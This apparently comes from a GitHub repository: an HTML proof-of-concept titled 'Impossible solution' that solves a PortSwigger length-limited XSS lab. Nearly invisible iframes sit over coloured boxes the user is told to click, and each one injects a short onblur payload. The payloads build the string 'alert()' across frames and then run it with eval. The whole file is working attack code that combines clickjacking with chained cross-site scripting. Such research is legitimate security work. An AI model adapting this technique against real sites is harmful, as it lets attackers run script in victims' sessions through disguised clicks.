-
Notifications
You must be signed in to change notification settings - Fork 7
/
19charsOnblur.html
47 lines (32 loc) · 3.22 KB
/
19charsOnblur.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!DOCTYPE html>
<html>
<head>
<title>Impossible solution</title>
</head>
<body>
[*] Click on all the boxes from left to right<br><br>
<div style="display: inline-block;overflow: hidden;background-color:green; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y="al' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:blue; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y%2B="e' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:magenta; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y%2B="r' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:orange; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y%2B="t' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:yellow; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y%2B="(' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:brown; width: 45px; height: 16px; position: relative;" >
<iframe src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur=top.x.y%2B=")' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;overflow: hidden;background-color:pink; width: 45px; height: 16px; position: relative;" >
<iframe name=x src='https://portswigger-labs.net/impossible-labs/attribute-context-length-limit-arbitrary.php?x="onblur="eval(y)' style="opacity: 0.01;border: 0pt none ; left: -37px; top: -210px; position: absolute; width: 1734px; height: 866px;" scrolling="no">
</iframe></div>
<div style="display: inline-block;background-color:red; width: 45px; height: 16px;" >
</div>
</body>
</html>